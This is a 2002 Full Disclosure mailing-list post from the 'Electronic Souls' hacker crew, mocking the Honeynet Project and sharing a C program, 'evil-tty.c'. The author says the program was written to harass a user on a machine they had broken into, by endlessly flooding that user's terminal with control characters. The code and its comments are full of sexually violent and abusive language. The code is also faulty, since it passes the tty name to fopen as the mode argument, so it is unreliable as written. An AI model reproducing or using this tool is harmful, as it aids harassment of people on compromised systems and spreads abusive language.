Full Disclosure mailing list archives

[ElectronicSouls] - Honeynet Tools


From: es () hush com
Date: Fri, 29 Nov 2002 08:37:34 -0800


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We at Electronic Souls have recently struck a deal with Lance Spitzner
to teach him some useful UNIX commands, in exchange for being official
members of his Project Honeynet.  Here is one of the tools that we have
already provided him with.

# cat evil-tty.c
/*
 * (C) BrainStorm - ElectronicSouls
 *
 * i made this for a little annoying kiddie that i 0wned..
 * ..so we gonna have some fun with that lamer ;) .immortal Blackhat !ยง$%
 * this will send garbage to a tty ..no this is not lame, but simple
 * and effective to piss ./kidz off..in hands of kidz this could get annoying tr
ue..
 * so may not be distributed without the permission of the ElectronicSouls crew!
 * .
 */

#include <stdio.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{

   int rape = 1;
   char *dev = "/dev/"; /* device */

   FILE *evil_tty;

   if (argc < 1)
   {
    printf("you should feed me a tty dude..\n"); /* usage */
    exit(1);
   }

   printf("eviltty.c - (C) BrainStorm - ElectronicSouls\n\n");

   evil_tty = fopen(dev,argv[1]); /* open tty */

   if (evil_tty == 0) /* error handling */
   {
    printf("damn! couldnt open nor write to target tty. Check the permissions.\n
");
    exit(0);
   }
    printf("the bitch on %s is getting raped..\n",dev);

    while (rape == 1)
    {
     fprintf(evil_tty,"\b\n\b\n\b\n\b\n\b\n\b\b\b\b\b\n\n\n\n"); /* send evil da
ta to tty */
      fflush(evil_tty);

     sleep(10); /* you may change this..or not */
    }
   printf("ES - fscking ./kidz since 1995 ;>\n");
}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Proud supporters of Project Honeynet."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nl+AMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltGdMAoLbZxINUG9pO
SYtkVyMVUlyHb69hAJ43PM7hqCPzO4fAOJprMD9K7kEZBA==
=ilRh
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: